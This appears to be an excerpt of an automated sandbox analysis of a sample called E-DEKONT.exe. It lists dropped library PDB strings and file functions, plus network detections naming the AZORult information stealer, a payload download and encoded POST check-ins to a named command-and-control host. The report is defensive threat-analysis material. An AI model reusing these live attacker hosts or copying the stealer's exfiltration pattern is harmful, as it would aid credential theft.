                  Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108895399238.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.4.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.4.dr
                  Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108939745209.000000001E720000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108897608996.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943398108.000000001E764000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943189299.000000001E75C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942964361.000000001E758000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108898625241.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108884231351.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938761713.000000001E700000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108901775165.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943979243.000000001E774000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943865478.000000001E770000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943398108.000000001E764000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108902878047.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943738244.000000001E76C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943189299.000000001E75C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942964361.000000001E758000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943576314.000000001E768000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108944571274.000000001E798000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108908823587.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108908941995.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944687963.000000001E79C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940014730.000000001E724000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108890563485.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939745209.000000001E720000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940725893.000000001E730000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940489498.000000001E72C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108889973154.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940250648.000000001E728000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.4.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr
                  Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.4.dr
                  Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108892004613.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108891891978.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.4.dr
                  Source: Binary string: vcruntime140.i386.pdb source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108963064431.000000001DDA8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938291383.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.4.dr
                  Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108909446480.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944759936.000000001E7A8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.4.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.4.dr
                  Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943398108.000000001E764000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943738244.000000001E76C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943189299.000000001E75C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942964361.000000001E758000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943576314.000000001E768000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.4.dr
                  Source: Binary string: msvcp140.i386.pdbGCTL source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108954916729.000000001DAB8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108919075540.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108919898776.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.4.dr
                  Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942964361.000000001E758000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108896445391.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108887027855.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939056355.000000001E704000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108886923210.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939281482.000000001E708000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939672315.000000001E714000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938761713.000000001E700000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939473726.000000001E70C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939584393.000000001E710000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945064477.000000001E7AC000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944759936.000000001E7A8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945279969.000000001E7C0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940014730.000000001E724000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939745209.000000001E720000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940489498.000000001E72C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108889973154.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940250648.000000001E728000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940014730.000000001E724000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939745209.000000001E720000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940250648.000000001E728000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108944393476.000000001E788000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944067627.000000001E780000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944495518.000000001E78C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944279818.000000001E784000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108907116476.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108905955571.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108913399205.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108912726161.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.4.dr
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_004065C5 FindFirstFileW,FindClose,1_2_004065C5
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405990
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_00402862 FindFirstFileW,1_2_00402862

                  Networking

                  Source: Traffic Snort IDS: 2029468 ET TROJAN Win32/AZORult V3.3 Client Checkin M15 192.168.11.20:49852 -> 104.21.44.194:80
                  Source: Traffic Snort IDS: 2029137 ET TROJAN AZORult v3.3 Server Response M2 104.21.44.194:80 -> 192.168.11.20:49852
                  Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: global traffic HTTP traffic detected: GET /rufZpHlxPMyoMZPqPua74.rar HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: aapancart.com Cache-Control: no-cache
                  Source: global traffic HTTP traffic detected: POST /db1/index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Host: dbxo1.shop Content-Length: 103 Cache-Control: no-cache Data Raw: 00 00 00 41 70 9d 32 13 8b 30 60 8b 30 63 8b 30 6c 8b 30 67 8b 30 67 8b 31 11 8b 30 6c 8b 30 61 8b 30 64 8b 30 61 8b 30 6c 8b 30 65 8b 30 62 ef 26 67 ea 42 70 9d 35 70 9d 32 10 8b 30 64 8b 30 60 eb 45 70 9c 47 70 9d 34 70 9d 33 70 9d 36 13 ec 47 70 9d 31 11 8b 31 11 eb 46 16 8b 30 63 8b 30 6c 8b 30 63 eb 40 Data Ascii: Ap20`0c0l0g0g10l0a0d0a0l0e0b&gBp5p20d0`EpGp4p3p6Gp11F0c0l0c@
                  Source: global traffic HTTP traffic detected: POST /db1/index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Host: dbxo1.shop Content-Length: 41815 Cache-Control: no-cache
                  Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49851
                  Source: unknown Network traffic detected: HTTP traffic on port 49851 -> 443
                  Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: E-DEKONT.exe, 00000004.00000002.109020742612.000000001D9E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: HTTPS://LOGIN.LIVE.COM/
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 
00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 
00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                  Source: E-DEKONT.exe, 00000004.00000003.108967585571.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108963689288.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966284437.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108880828920.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108992838973.0000000001A5B000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108965615744.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108968098553.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108968805939.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108827106899.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966999405.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108969478234.0000000001A6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
